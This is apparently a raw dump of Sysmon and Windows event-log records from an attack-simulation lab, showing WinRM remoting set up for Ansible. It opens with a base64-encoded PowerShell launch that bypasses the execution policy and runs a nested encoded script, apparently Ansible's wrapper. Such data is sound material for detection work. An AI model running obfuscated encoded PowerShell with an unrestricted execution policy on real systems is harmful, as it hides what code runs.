UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DBF-6078-C002-00000000AD01}3644C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.226{A8622C2F-3DBF-6078-C002-00000000AD01}3644C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:01.714{A8622C2F-3DBD-6078-BF02-00000000AD01}4336C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3C57-6078-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:00.268{A8622C2F-3DBC-6078-BE02-00000000AD01}4992C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3C57-6078-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{A8622C2F-3C57-6078-0A00-00000000AD01}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 04/15/2021 01:09:44 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=89134 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T13:09:44.631000000Z from ‎2021‎-‎04‎-‎15T13:09:44.631286700Z. Change Reason: An application or system component changed the time. 04/15/2021 01:08:12 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13541 Keywords=Classic Message=PS Remoting has been successfully configured for Ansible. 04/15/2021 01:08:12 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13540 Keywords=Classic Message=Added firewall rule to allow WinRM HTTPS. 04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13539 Keywords=Classic Message=Enabled basic auth support. 04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13538 Keywords=Classic Message=Enabled SSL listener. 04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13537 Keywords=Classic Message=Self-signed SSL certificate generated; thumbprint: C00AE5CD081BAC6B2B2FE05B145526D20C508A1F 04/15/2021 12:29:04 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88963 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:29:04.919000000Z from ‎2021‎-‎04‎-‎15T12:29:04.931800200Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:36 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88945 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:36.137000000Z from ‎2021‎-‎04‎-‎15T12:28:36.151036400Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:19 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88929 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:19.016934400Z from ‎2021‎-‎04‎-‎15T12:28:19.016934400Z. Change Reason: System time adjusted to the new time zone. 04/15/2021 12:28:14 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88878 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:14.198000000Z from ‎2021‎-‎04‎-‎15T12:28:14.202873000Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:14 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88877 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:14.198279800Z from ‎2021‎-‎04‎-‎15T12:28:14.198279800Z. Change Reason: System time adjusted to the new time zone. 04/15/2021 12:27:25 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-4AGFDD4 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88809 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:27:25.369000000Z from ‎2021‎-‎04‎-‎15T12:27:25.385665200Z. Change Reason: An application or system component changed the time. 04/15/2021 12:27:25 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-4AGFDD4 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88808 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:27:25.385247100Z from ‎2021‎-‎04‎-‎15T12:27:25.385247100Z. Change Reason: System time adjusted to the new time zone.